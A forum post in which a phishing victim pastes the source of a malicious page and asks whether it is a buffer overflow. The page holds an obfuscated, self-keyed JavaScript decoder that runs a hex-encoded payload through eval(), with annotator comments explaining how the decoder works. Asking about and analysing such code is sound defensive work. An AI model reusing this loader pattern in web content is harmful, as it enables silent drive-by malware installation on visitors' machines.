I just received a phishing email posing as Google AdWords.
I went to the root of the site to see if it was just one page that was dodgy or the whole site. An error box popped up telling me that c:\nywdm.exe had crashed.
On closer inspection, it looks like opening the page downloaded a 16-bit DOS exe.
At the moment I have no AV installed, as I have only just reformatted my HDD.
I am assuming that all is OK as the program fell over, but I don't understand how it downloaded itself and tried to execute without my permission.
I did a tracert for the site and have asked the hosting company at that IP address to shut the site down. They are Russian, so I can only hope that they can understand English.
The source code for the site is as follows. Is it an attempt at a buffer overflow? (That is beyond my ken.)
thanks in advance
<html>
<body><h1> Loading... Please wait</h1>
<script language="JavaScript">
<!--
// REVIEW NOTES. These are kept outside the function body on purpose: the routine reads
// its own source through arguments.callee.toString(), so any word character added inside
// it (a comment included) changes the key it derives, and the payload no longer decodes.
//
// x712b7j66(dPjAxoy7W, GD7Fr0618): self-keyed decoder that ends in eval().
//   dPjAxoy7W - string of hex byte pairs (the encoded script).
//   GD7Fr0618 - declared but never read.
// Steps, in order:
//   1. Take its own source text, strip every non-word character (/\W/g) and upper-case it.
//   2. Build a 256-entry lookup table from the constant 3988292384 (0xEDB88320) and run a
//      table-driven checksum over that text, starting from 4294967295 and XOR-ing with
//      4294967295 at the end; this matches the usual CRC-32 construction.
//   3. Render the checksum as upper-case hex, left-padded with '0' to 8 characters. The
//      character codes of those 8 characters become an 8-entry key array (the `else`
//      branch that stores 7 looks unreachable once the string is 8 characters long).
//   4. Walk dPjAxoy7W two hex digits at a time, subtract the current key entry (adding 256
//      when the result is negative), append the resulting character, and cycle the key
//      index through 0..7.
//   5. eval() the decoded string. What that string contains is not visible in this listing.
// N0G2HsE12 ('MAYBE---') and K7cbv55yT (100, 10394, 11) are assigned but never read, and
// LUq0gF2Xb only holds the input length; they look like filler. jY3GV0SXH is used without
// `var`, so it is created as a global.
// Analysis caveat: the self-checksum acts as a tamper check. Recover the payload from an
// exact copy of the function in an isolated environment; editing eval() in place changes
// the key and yields garbage.
// The line break inside the identifier H7aqYJtto (end of the first line below) appears to
// come from the forum's wrapping; as posted, the listing would not parse.
function x712b7j66(dPjAxoy7W,GD7Fr0618){var H7aqYJtto;var y6DbFO7y5;var RDJNQ7677='';var EsWQ77JXj=new Array();var CSED2elvW=arguments.callee.toString();var X1O4ikfhM=CSED2elvW.replace(/\W/g,'');X1O4ikfhM=X1O4ikfhM.toUpperCase();var onjDb2BBv=X1O4ikfhM.length;for(H7aqYJtto=0;H7aqYJtto<256;H7aqYJtto++) {EsWQ77JXj[H7aqYJtto]=0;}var BW0woN8C2=1;for(H7aqYJtto=128;H7aqYJtto;H7aqYJtto>>=1) {BW0woN8C2=(BW0woN8C2>>>1)^((BW0woN8C2&1)?3988292384:0);for(jY3GV0SXH=0;jY3GV0SXH<256;jY3GV0SXH+=H7aqYJtto*2) {EsWQ77JXj[jY3GV0SXH+H7aqYJtto]=(EsWQ77JXj[jY3GV0SXH]^BW0woN8C2);if (EsWQ77JXj[jY3GV0SXH+H7aqYJtto] < 0) {EsWQ77JXj[jY3GV0SXH+H7aqYJtto]+=4294967296;}}}y6DbFO7y5=4294967295;var N0G2HsE12='MAYBE---';for(BW0woN8C2=0;BW0woN8C2<onjDb2BBv;BW0woN8C2++) {y6DbFO7y5=EsWQ77JXj[(y6DbFO7y5^X1O4ikfhM.charCodeAt(BW0woN8C2))&255]^((y6DbFO7y5>>8)&16777215);}y6DbFO7y5=y6DbFO7y5^4294967295;if (y6DbFO7y5<0) {y6DbFO7y5+=4294967296;}y6DbFO7y5=y6DbFO7y5.toString(16).toUpperCase();var D72ue5eUj=8-y6DbFO7y5.length;for(H7aqYJtto=0;H7aqYJtto<D72ue5eUj;H7aqYJtto++) {y6DbFO7y5='0'+y6DbFO7y5;}var Ss1888mUw=new Array();var K7cbv55yT=100;var onjDb2BBv=y6DbFO7y5.length;for(H7aqYJtto=0;H7aqYJtto<8;H7aqYJtto++) {var oQjX53QIs=onjDb2BBv+H7aqYJtto;if (oQjX53QIs>=8) {oQjX53QIs=oQjX53QIs-8;Ss1888mUw[H7aqYJtto]=y6DbFO7y5.charCodeAt(oQjX53QIs);} else {Ss1888mUw[H7aqYJtto]=7;}}var sYFrNoxca=0;var IJKsc8LMP;K7cbv55yT=10394;var LUq0gF2Xb=new Array();LUq0gF2Xb[0]=dPjAxoy7W.length;onjDb2BBv=LUq0gF2Xb[0];for(H7aqYJtto=0;H7a
qYJtto<onjDb2BBv;H7aqYJtto+=2){var Xb2QH4W1X=dPjAxoy7W.substr(H7aqYJtto,2);var RkI21Ucj4=parseInt(Xb2QH4W1X,16);IJKsc8LMP=RkI21Ucj4-Ss1888mUw[sYFrNoxca];if(IJKsc8LMP<0) {IJKsc8LMP=IJKsc8LMP+256;}RDJNQ7677+=String.fromCharCode(IJKsc8LMP);if(sYFrNoxca<Ss1888mUw.length-1) {sYFrNoxca++;} else {sYFrNoxca=0;K7cbv55yT=11;}}eval(RDJNQ7677);}
// Invocation of the decoder defined above in this listing: the encoded script is passed
// as the only argument, so the second declared parameter is left undefined.
// The literal is a run of hex byte pairs in mixed case; the decoder reads them with
// parseInt(..., 16), which accepts either case.
// The line breaks inside the quoted string appear to be forum wrapping; a JavaScript
// string literal cannot span lines like this, so the original was presumably one line.
// NOTE(review): the decoded script is not shown on the page, so whether it relies on a
// buffer overflow or on some other browser flaw cannot be confirmed from this listing.
// The crash dialog the poster describes does not show that the page failed; until the
// machine has been checked, treat it as possibly compromised.
x712b7j66('97A197ad9fA9a1b761A9A6A1A6a95B6a6f9b9aaa93B19863A6a4977554ACa7B7a36C6367677C
61796860666b6b72667296999d6594adA172a0939dA460a79aAC72A271ACA1B659ac70625658a9ad9
7b79B6f566954649Ba89C999Cac6F66646553a5A8b19eA9706595a1a69c97B66d6363a2ac5A708062
AC99A495a597825A6c6E');
//-->
</script>
</body>
</html>